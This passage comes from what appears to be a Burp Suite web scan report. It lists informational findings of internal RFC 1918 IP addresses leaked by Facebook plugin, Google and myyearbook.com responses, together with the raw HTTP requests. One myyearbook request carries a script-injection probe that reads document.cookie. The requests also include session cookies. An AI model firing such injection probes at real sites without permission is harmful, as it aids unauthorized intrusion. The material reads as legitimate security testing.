Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

23.150. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.216.57

Request

GET /plugins/like.php?href=http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations&show_faces=false&width=178&font=arial&ref=art HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

23.151. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.43.110.55

Request

Response

23.152. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.64.98.65

Request

Response

23.153. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.79.60

Request

GET /plugins/like.php?href=http%3A%2F%2Fgo.ionearth.com&layout=button_count&show_faces=false&width=450&action=like&font=tahoma&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://go.ionearth.com/
Cookie: locale=en_US; datr=IykoTi-5gj--5ol5RZyR1cQ2

Response

23.154. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.55.36

Request

Response

23.155. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.188.53

Request

GET /plugins/like.php?href=https%3A%2F%2Fmy.seashepherd.org%2FNetCommunity%2FSSLPage.aspx%3Fpid%3D184&layout=button_count&show_faces=false&width=100&action=like&font=arial&layout=button_count HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.seashepherd.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

23.156. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.149.47

Request

GET /plugins/like.php?href=https%3A%2F%2Fmy.seashepherd.org%2FNetCommunity%2FSSLPage.aspx%3Fpid%3D398&layout=button_count&show_faces=false&width=100&action=like&font=arial&layout=button_count HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.seashepherd.org/
Cookie: locale=en_US; datr=IykoTi-5gj--5ol5RZyR1cQ2

Response

23.157. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.103.54

Request

GET /plugins/like.php?api_key=216232338409059&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df339b1be3%26origin%3Dhttp%253A%252F%252Fwww.hitcon.org%252Ff1660341d%26relation%3Dparent.parent%26transport%3Dpostmessage&font=trebuchet%20ms&href=http%3A%2F%2Fwww.hitcon.org%2Fhit2011%2F&layout=standard&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=true&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.hitcon.org/hit2011/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

23.158. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.64.22.61

Request

GET /plugins/like.php?app_id=226108940744302&href=http%3A%2F%2Fcorp.klout.com%2Fblog%2F2011%2F06%2Ftop-10-women-with-klout%2F&send=false&layout=button_count&width=400&show_faces=false&action=like&colorscheme=light&font&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://corp.klout.com/blog/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

23.159. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.251.63

Request

GET /plugins/like.php?api_key=216232338409059&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df102a706bf6c10c%26origin%3Dhttp%253A%252F%252Fwww.hitcon.org%252Ff3d074be8c359d%26relation%3Dparent.parent%26transport%3Dpostmessage&font=trebuchet%20ms&href=http%3A%2F%2Fwww.hitcon.org%2Fhit2011%2F&layout=standard&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=true&width=450 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hitcon.org/hit2011/
Cookie: locale=en_US; datr=IykoTi-5gj--5ol5RZyR1cQ2

Response

23.160. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.63.25.62

Request

Response

23.161. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.191.34

Request

GET /plugins/like.php?href=https%3A%2F%2Fmy.seashepherd.org%2FNetCommunity%2FSSLPage.aspx%3Fpid%3D184&layout=button_count&show_faces=false&width=100&action=like&font=arial&layout=button_count HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.seashepherd.org/
Cookie: locale=en_US; datr=IykoTi-5gj--5ol5RZyR1cQ2

Response

23.162. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.195.47

Request

GET /plugins/like.php?action=recommend&api_key=133255656700169&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfda8110b8%26origin%3Dhttp%253A%252F%252Fwww.treehugger.com%252Ff135c372b4%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&href=http%3A%2F%2Fwww.treehugger.com%2Ffiles%2F2011%2F07%2Fsea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=true&width=468 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/files/2011/07/sea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

23.163. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.64.62.46

Request

GET /plugins/like.php?app_id=226108940744302&href=http%3A%2F%2Fcorp.klout.com%2Fblog%2F2011%2F07%2Ftop-10-influencers-on-beer%2F&send=false&layout=button_count&width=350&show_faces=true&action=like&colorscheme=light&font&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://corp.klout.com/blog/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

23.164. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.178.52

Request

GET /plugins/like.php?href=%2Fcampaigns%2Fwhales%2Fwhale-wars%23gallery&layout=button_count&show_faces=false&width=100&action=like&font=arial&layout=button_count HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.seashepherd.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

23.165. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.181.43

Request

GET /plugins/like.php?href=www.facebook.com%2Fseashepherdconservationsociety&layout=button_count&show_faces=false&width=100&action=like&font=arial&layout=button_count HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.seashepherd.org/
Cookie: locale=en_US; datr=IykoTi-5gj--5ol5RZyR1cQ2

Response

23.166. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.188.39

Request

GET /plugins/like.php?href=www.facebook.com%2Fseashepherdconservationsociety&layout=button_count&show_faces=false&width=100&action=like&font=arial&layout=button_count HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.seashepherd.org/news-and-media/2011/07/19/emergency-sos-from-captain-paul-watson-save-our-ship-1263
Cookie: locale=en_US; datr=IykoTi-5gj--5ol5RZyR1cQ2

Response

23.167. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.168.31

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.seashepherd.org&layout=button_count&show_faces=false&width=100&action=like&font=arial&layout=button_count HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.seashepherd.org/
Cookie: locale=en_US; datr=IykoTi-5gj--5ol5RZyR1cQ2

Response

23.168. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.43.68.21

Request

GET /plugins/like.php?action=like&api_key=109674171476&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1f1061f5cee60e%26origin%3Dhttp%253A%252F%252Fgames.myyearbook.com%252Ff27f375cb11f1dc%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.myyearbook.com%2F&layout=button_count&locale=en_US&node_type=link&ref=facebookLike_Link_HBL&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: locale=en_US; datr=IykoTi-5gj--5ol5RZyR1cQ2

Response

23.169. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.43.68.59

Request

GET /plugins/like.php?action=like&api_key=109674171476&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df18e2142842bf6%26origin%3Dhttp%253A%252F%252Fwww.myyearbook.com%252Ff2e4895dade670e%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.myyearbook.com%2F&layout=button_count&locale=en_US&node_type=link&ref=facebookLike_Link_HBL&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/
Cookie: locale=en_US; datr=IykoTi-5gj--5ol5RZyR1cQ2

Response

23.170. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.189.46

Request

GET /plugins/like.php?href=https%3A%2F%2Fmy.seashepherd.org%2FNetCommunity%2FSSLPage.aspx%3Fpid%3D398&layout=button_count&show_faces=false&width=100&action=like&font=arial&layout=button_count HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.seashepherd.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

23.171. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.64.70.44

Request

Response

23.172. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.138.46

Request

Response

23.173. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.63.35.50

Request

Response

23.174. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.142.65

Request

Response

23.175. http://www.google.com/sdch/StnTz5pY.dct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/sdch/StnTz5pY.dct

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.31.196.197

Request

GET /sdch/StnTz5pY.dct HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; NID=49=hF3sNFzNDiZMKMwt0WZVsaf-tISuy02NG32GFzcjWjmHZDjyHO4cH85LuW7T8eHtFsOa_-uBcVgFtj8eePDVp7JiXpDa_p72IxDR6LUJuVTSf2YVSO5Uj8_SPahG4RWl
If-Modified-Since: Wed, 20 Jul 2011 02:20:55 GMT

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Type: application/x-sdch-dictionary
Last-Modified: Thu, 21 Jul 2011 14:53:28 GMT
Date: Thu, 21 Jul 2011 19:05:03 GMT
Expires: Thu, 21 Jul 2011 19:05:03 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 124609

Domain: .google.com
Path: /search

<!doctype html> <head> <title> - Google Search</title> <script>window.google={kEI:" NMWJ_5AK_rfB8gw",kEXPI:"28505,288 30316,31303,31405",kCSI
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: YKq3QHbl0RwJ:www.autotrader.com/+used+cary4a-lQGHU2cJ:www.vehix.com/+used+car &hl=en&ct=clnk&gl=us&source=www.google.com onmousedown="return clk(this.hre
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:rZQjSq2ux10J:translate.reference.com/+Hzpd6vNFcrsJ:translate.google.com/+ &hl=en&ct=clnk&gl=us&source=www.google.com','','','',' 9&hl=en&ct=clnk&gl=us&source=www.google.com','','',
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: &cd=3 onmousedown="return clk(this.href,'','','',' ')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: &hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','',' >
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:H75rMPosXksJ:www.cars.com/+used+carOJ7l3PBi2ywJ:www.usedcars.com/+used+car1nPyaj3yx18J:www.orbitz.com/App/DisplayCarSearch+ &hl=en&ct=clnk&gl=us&source=ww
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: rnetlion.com/article/Direct-TV-vs-Dish-Network KvzX53GQf98J:www.directv.com/DTVAPP/content/My_Account OHG47yeqhSoJ:www.directv.com/DTVAPP/content/contact_us
...[SNIP]...

23.176. http://www.myyearbook.com/advertising/default.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.myyearbook.com
Path:	/advertising/default.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.100.10.212

Request

GET /advertising/default.php?n=TribalFusion&section=None&size=728x90&site=MYB&sub=Net/f145c%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E43acc39f631work HTTP/1.1
Host: www.myyearbook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/1
Cookie: mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; __utma=138725551.1708338480.1311271168.1311271168.1311273812.2; __utmz=138725551.1311273812.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1424153722-1311271168512; scorecardresearch=89164312-271382480-1311271170773; __gads=ID=e4ff36fbd53734c2:T=1311271225:S=ALNI_MYXbcCfMT7-Mayo-AiWicg3ClEByg; __utmv=138725551.|1=gender=unknown=1

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:25:44 GMT
Server: Apache
X-Server-Name: web62
Content-Length: 918
Connection: close
Content-Type: text/html; charset=UTF-8
X-MyPoolMember: 10.100.10.212

<style>body{ padding:0px;margin:0px; }</style>
<html>
<head>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
<script type="text/javascri
...[SNIP]...

23.177. http://www.myyearbook.com/advertising/default.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.myyearbook.com
Path:	/advertising/default.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.100.10.92

Request

GET /advertising/default.php?n=Pubmatic&section=None&size=728x90&site=MYB HTTP/1.1
Host: www.myyearbook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/advertising/default.php?n=TribalFusion&section=None&size=728x90&site=MYB&sub=Network
Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; __utma=138725551.1708338480.1311271168.1311271168.1311271168.1; __utmb=138725551.1.10.1311271168; __utmc=138725551; __utmz=138725551.1311271168.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1424153722-1311271168512; scorecardresearch=89164312-271382480-1311271170773; MYB_TARGET=_unknown_1000_____; __gads=ID=e4ff36fbd53734c2:T=1311271225:S=ALNI_MYXbcCfMT7-Mayo-AiWicg3ClEByg

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 18:00:57 GMT
Server: Apache
X-Server-Name: web36
Content-Length: 764
Connection: close
Content-Type: text/html; charset=UTF-8
X-MyPoolMember: 10.100.10.92

<style>body{ padding:0px;margin:0px; }</style>
<html>
<head>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
<script type="text/javascri
...[SNIP]...

23.178. http://www.myyearbook.com/advertising/default.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.myyearbook.com
Path:	/advertising/default.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.100.10.105

Request

GET /advertising/default.php?n=TribalFusion&section=None&size=728x90&site=MYB&sub=Network HTTP/1.1
Host: www.myyearbook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
